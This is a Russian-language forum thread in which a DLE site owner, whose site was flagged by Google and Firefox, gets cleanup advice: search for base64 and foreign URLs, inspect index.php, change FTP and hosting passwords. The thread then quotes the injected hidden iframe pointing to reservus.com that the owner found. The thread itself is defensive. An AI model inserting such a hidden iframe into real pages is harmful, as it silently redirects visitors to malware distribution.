• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Помощь Ломанули сайт?

Статус
В этой теме нельзя размещать новые ответы.

Panadol

Продавец здоровья
Регистрация
20 Апр 2007
Сообщения
306
Реакции
292
Сегодня пришло письмо от гугла
, а также файрфокс блокирует содержимое сайта:
Для просмотра ссылки Войди или Зарегистрируйся
Кто подскажет что сейчас делать? Где искать заразу?
Дле 8.3
 
поотключать рекламу и поискать по всем двигу base64 и левые адреса, что у вас на скрине (reservus и тд) это первое что бы я сделал)
 
поотключать рекламу и поискать по всем двигу base64 и левые адреса, что у вас на скрине (reservus и тд) это первое что бы я сделал)
Да не кто вас не ломал меньше надо ставить шаровыые шаблоны и также шаровые двиги ставьте только с провереных источников и будет вам счастье
У меня такое было проверь DLE антивирусом
А вообше лучше сноси сайт и ставь новый
 
Да не кто вас не ломал меньше надо ставить шаровыые шаблоны и также шаровые двиги ставьте только с провереных источников и будет вам счастье
У меня такое было проверь DLE антивирусом
А вообше лучше сноси сайт и ставь новый
Не обязательно. Проверь просто файлики все по дате. Которые были отредактированы день-два назад. Посмотри index.php который лежит в корне. Обычно в него всё дописывают.
Смени пароли на фтп и хостинг.
Проверь свой комп на вирусню.
 
Проверь просто файлики все по дате. Которые были отредактированы день-два назад.
не факт, дату редактирования вполне могли поменять тоже.
а вообще полезно бекапы делать ;)
 
Что-бы дату поменять надо уже иметь права на сервере/вдс, не факт что там не простой виртуалхост, банально можно встроеным антивирусом посмотреть если был снепшот сделал раньше, хотя обычно фрейм как раз в index.php ибо руками вам его вставлять небудут а скрипты настроны на индекс файл, или в начале или в конце :)
 
Да не кто вас не ломал меньше надо ставить шаровыые шаблоны
Шаровые шаблоны не ставил - делали на заказ.
и также шаровые двиги ставьте только с провереных источников и будет вам счастье
Двиг брал здесь, на нулледе
У меня такое было проверь DLE антивирусом
А вообше лучше сноси сайт и ставь новый
ДЛЕ антивирем проверял - ничего не находит
Andrey-varvara написал(а):
Посмотри index.php который лежит в корне. Обычно в него всё дописывают.
Точно!!! Так и есть - проверил index.php и вот что там было в конце:
Код:
<IFRAME src="http://reservus.com/tds/go.php?sid=1" width=1 height=1 style="display:none"></IFRAME>
У меня вопрос - как думаете через что сломали? И какие сейчас лучше действия произвести? Стоит ли искать другие ссылки - _663se2s.co.cc, _hsloader.com или они все грузились через _reservus.com?
 
может трой подцепил и пасы от ftp унесли
 
Делай бэкап и меняй все пароли от сайта. Это полезно делать.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху